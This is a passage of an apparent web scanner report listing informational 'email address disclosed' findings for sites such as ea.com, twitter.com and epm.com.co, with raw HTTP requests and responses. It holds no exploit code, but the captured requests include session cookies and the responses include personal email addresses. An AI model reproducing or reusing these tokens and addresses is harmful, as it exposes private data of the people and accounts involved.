Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 07 Mar 2011 06:33:53 GMT
ETag: "6c32-49ddeadeaf640"
Accept-Ranges: bytes
Cache-Control: max-age=86400, public, public
Expires: Sat, 25 Jun 2011 13:20:36 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 27698
Content-Type: application/javascript

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...
22.19. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tos.ea.com
Path:   /legalapp/WEBPRIVACY/US/en/PC/

Issue detail

The following email address was disclosed in the response:

Request

GET /legalapp/WEBPRIVACY/US/en/PC/ HTTP/1.1
Host: tos.ea.com
Proxy-Connection: keep-alive
Referer: http://customersupport.ea.com/loginapp/forgotScreenName.do?locale=en_US&surl=http%3A%2F%2Fsupport.ea.com%2Fci%2Fpta%2Flogin&curl=http%3A%2F%2Fsupport.ea.com%2Fapp%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:20 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Cache-Control: no-cache
Content-Location: webprivacy/us/en/pc/default/54402_6/54402_7
Content-Type: text/html;charset=UTF-8
Content-Length: 46341

<div style="text-align: center;"><span style="font-weight:
bold;">ELECTRONIC ARTS PRIVACY
POLICY</span><br><br><span style="font-weight:
bold;">Effective Date</span>: June 3, 2011
</div><a hre
...[SNIP]...
is not to disclose personal information collected online to a
third party for direct marketing purposes without your approval. If you
choose to opt-out at any time after granting approval, email
privacy_policy@ea.com or write to Privacy Policy Administrator,
Electronic Arts Inc., 209 Redwood Shores Pkwy, Redwood City, CA
94065.<br>
...[SNIP]...
22.20. http://twitter.com/account/bootstrap_data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/bootstrap_data

Issue detail

The following email address was disclosed in the response:

Request

GET /account/bootstrap_data?r=0.09503758209757507 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; k=173.193.214.243.1308571866345827; guest_id=13086187569807267; js=1; __utma=43838368.1598605414.1305368954.1308844594.1308913365.9; original_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D; external_referer=Bm9gjDJKLkMCmTGfXi%2Fo4fSNTngTGWZb0S9qzLzLKytyYNzFWm%2B%2F%2F6n0FbfbkHoIM9Z5WpSyRcI%3D%7C0; _twitter_sess=BAh7CToHaWQiJTRiNDI1MTMzMzJhMTg4NTRiNDFhOTdiOTZlMzg5ZTVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIroPowTABOg5yZXR1cm5fdG8iGmh0%250AdHA6Ly90d2l0dGVyLmNvbS9lYQ%253D%253D--57ce6322c881303420c7a2999ad9eb17f6d34d92

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923299-65253-14033
ETag: "03ee75506292ab9774ebfbb7ad2225bd"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:48:19 GMT
X-Runtime: 0.07468
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7b33e5e039b58fc178c74699f7296f277cc4c01c
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNDVjYTdjMjdkZWM4NTBjNDkyY2Y3MGRmNGI5MWQ3%250ANzE6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--728e4ee9309f30116873ed5faa7d4dc92cd933d5; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 23179
Connection: close

{"pageLocale":"en","globalConfig":{"max_media_per_upload":1,"short_url_length":19,"short_url_length_https":20,"photo_size_limit":3145728,"characters_reserved_per_media":20,"photo_sizes":{"medium":{"h"
...[SNIP]...
h","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1146993502\/glasses_normal.jpg","id":5405152,"description":"I like reading, music, mountain biking, technology, and having conversations. da@dawallach.com","screen_name":"DAChesterFrench"},{"name":"Judah Friedlander","profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/1124117561\/14_lores_normal.jpg","id":28744383,"description":"I am The World C
...[SNIP]...
22.21. http://videogamevoters.org/page/-/js/vgvn-source.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /page/-/js/vgvn-source.js

Issue detail

The following email address was disclosed in the response:

Request

GET /page/-/js/vgvn-source.js HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-CheckNode=; X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/x-c
Date: Fri, 24 Jun 2011 13:41:34 GMT
Keep-Alive: timeout=3, max=96
Last-Modified: Tue, 28 Sep 2010 19:39:22 GMT
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 27869

/*
* Copyright (c) 2009 Simo Kinnunen.
* Licensed under the MIT license.
*
* @version 1.09
*/
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(fu
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.22. https://www.ea.com/profile/js/jquery_facebox.jsx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/js/jquery_facebox.jsx

Issue detail

The following email address was disclosed in the response:

Request

GET /profile/js/jquery_facebox.jsx?ver=1.10.0_en_US HTTP/1.1
Host: www.ea.com
Connection: keep-alive
Referer: https://www.ea.com/profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:47 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 9774
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...
22.23. http://www.epm.com.co/epm/web/_admincom/admincom_pye_bienvenida.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/admincom_pye_bienvenida.html

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_admincom/admincom_pye_bienvenida.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1477
Date: Fri, 24 Jun 2011 15:12:30 GMT
Content-Type: text/html
ETag: "3c3a19f5f31ecc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Mon, 30 May 2011 18:04:02 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- InstanceBeginEditable name="correo contacto" -->SeccionEventosyPatrocinios@epm.com.co<!-- InstanceEndEditable -->
...[SNIP]...
22.24. http://www.epm.com.co/epm/web/_admincom/banner19.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_admincom/banner19.html

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_admincom/banner19.html HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1349
Date: Fri, 24 Jun 2011 11:05:08 GMT
Content-Type: text/html
ETag: "80ba98e1d10cc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 11 May 2011 20:54:01 GMT
X-Powered-By: ASP.NET
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto: boletin.estamosahi@epm.com.co">
...[SNIP]...
22.25. http://www.epm.com.co/epm/web/_assets/code/mainComponentController.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/mainComponentController.js

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_assets/code/mainComponentController.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3023
Date: Fri, 24 Jun 2011 08:59:30 GMT
Content-Type: application/x-javascript
ETag: "0d89c9d907bcb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 03 Nov 2010 19:52:16 GMT
X-Powered-By: ASP.NET

//--------------------------------------------------------------
// epm.com.co - Junio 2010 (usando jQuery 1.4.2)
// Derechos Reservados (C) 2010 Jos.... Fernando Dur....n
// Soporte: josef.duran@gmail.com
//---------------------------------------------------------------


var comps = '';
var filesArray = [];


function startMainController(){
   
   var dep = $('#bloques_principales');
   
   $.get(index_comps
...[SNIP]...
22.26. http://www.epm.com.co/epm/web/_assets/code/mtc_rev1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/mtc_rev1.js

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_assets/code/mtc_rev1.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 13291
Date: Mon, 20 Jun 2011 20:46:13 GMT
Content-Type: application/x-javascript
ETag: "c355ba3aa9cc1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Tue, 03 May 2011 15:51:49 GMT
X-Powered-By: ASP.NET

//--------------------------------------------------------------
// epm.com.co - Junio 2010 (usando jQuery 1.4.2)
// Derechos Reservados (C) 2010 Jos.... Fernando Dur....n
// Soporte: josef.duran@gmail.com
//---------------------------------------------------------------


$(document).ready(function() {

//detener visualizaci..n de variables de traducci..n si exusten

...[SNIP]...
22.27. http://www.epm.com.co/epm/web/_assets/code/multicolumna.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/multicolumna.js

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_assets/code/multicolumna.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.2.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 2510
Date: Thu, 23 Jun 2011 18:41:47 GMT
Content-Type: application/x-javascript
ETag: "084ef94742ecb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 28 Jul 2010 16:47:36 GMT
X-Powered-By: ASP.NET

//--------------------------------------------------------------
// epm.com.co - Junio 2010 (usando jQuery 1.4.2)
// Derechos Reservados (C) 2010 Jos.. Fernando Dur..n
// Soporte: josef.duran@gmail.com
//---------------------------------------------------------------


// resize images
$('#multi_vertical').find('#scrollWrapper').find('div.contri img').each(function(){
   $(this).attr('height', '55');
...[SNIP]...
22.28. http://www.epm.com.co/epm/web/_assets/code/noticiasgrupo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/noticiasgrupo.js

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_assets/code/noticiasgrupo.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=6211303.1308934761.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=6211303.1146028634.1308934761.1308934761.1308934761.1; __utmc=6211303; __utmb=6211303.4.10.1308934761

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 5424
Date: Thu, 23 Jun 2011 18:41:49 GMT
Content-Type: application/x-javascript
ETag: "0d8c3788061cb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Fri, 01 Oct 2010 15:51:12 GMT
X-Powered-By: ASP.NET

//--------------------------------------------------------------
// epm.com.co - Junio 2010 (usando jQuery 1.4.2)
// Derechos Reservados (C) 2010 Jos.. Fernando Dur..n
// Soporte: josef.duran@gmail.com
//---------------------------------------------------------------


$.fn.slideEf = function () {

function repeat(str, num) {
return new Array( num + 1 ).join( str );
}


...[SNIP]...
22.29. http://www.epm.com.co/epm/web/_assets/code/variables_generales.cfg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /epm/web/_assets/code/variables_generales.cfg.js

Issue detail

The following email address was disclosed in the response:

Request

GET /epm/web/_assets/code/variables_generales.cfg.js HTTP/1.1
Host: www.epm.com.co
Proxy-Connection: keep-alive
Referer: http://www.epm.com.co/epm/web/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 3018
Date: Fri, 24 Jun 2011 08:59:30 GMT
Content-Type: application/x-javascript
ETag: "40c1667294f4cb1:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 19:54:32 GMT
X-Powered-By: ASP.NET

//--------------------------------------------------------------
// epm.com.co - Mayo 2010 (usando jQuery 1.4.2)
// Derechos Reservados (C) 2010 Jos.. Fernando Dur..n
// Soporte: josef.duran@gmail.com
//---------------------------------------------------------------


var imagenes = new Array();
// usted puede a..adir, editar o cambiar el orden de las siguientes lineas para afectar las
// i
...[SNIP]...
22.30. http://www.fuelprogress.com/USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fuelprogress.com
Path:   /USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js

Issue detail

The following email address was disclosed in the response:

Request

GET /USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js HTTP/1.1
Host: www.fuelprogress.com
Proxy-Connection: keep-alive
Referer: http://www.fuelprogress.com/USA-English/GFM/Microsite/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQQQRCDC=ECDLGFBCJCMIMDCONIELABEF

Response

HTTP/1.1 200 OK
Content-Length: 2988
Content-Type: application/x-javascript
Last-Modified: Thu, 01 Jul 2010 03:37:39 GMT
Accept-Ranges: bytes
ETag: "2d5f3fc1ce18cb1:830"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:27:40 GMT

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
/**
* -------
...[SNIP]...
22.31. http://www.gamersdailynews.com/js/lightbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamersdailynews.com
Path:   /js/lightbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/lightbox.js HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 06 Jan 2010 09:43:14 GMT
ETag: "670027-58d7-47c7bc887b080"
Accept-Ranges: bytes
Content-Length: 22743
Content-Type: application/javascript

// -----------------------------------------------------------------------------------
//
//    Lightbox v2.03
//    by Lokesh Dhakar - http://www.huddletogether.com
//    4/9/06
//
//    For more information on
...[SNIP]...
ty = "hidden";
   }

}


// ---------------------------------------------------

//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Help from Ran Bar-On [ran2103@gmail.com]
//

function pause(ms){
   var date = new Date();
   curDate = null;
   do{var curDate = new Date();}
   while( curDate - date < ms);
}
/*
function pause(numberMillis) {
   var curently = new Date().getTime()
...[SNIP]...
22.32. http://www.gamersdailynews.com/js/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamersdailynews.com
Path:   /js/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/prototype.js HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 06 Jan 2010 09:43:14 GMT
ETag: "670028-b9f3-47c7bc887b080"
Accept-Ranges: bytes
Content-Length: 47603
Content-Type: application/javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source tree
...[SNIP]...
22.33. http://www.metlife.com/individual/insurance/disability-insurance/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/disability-insurance/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
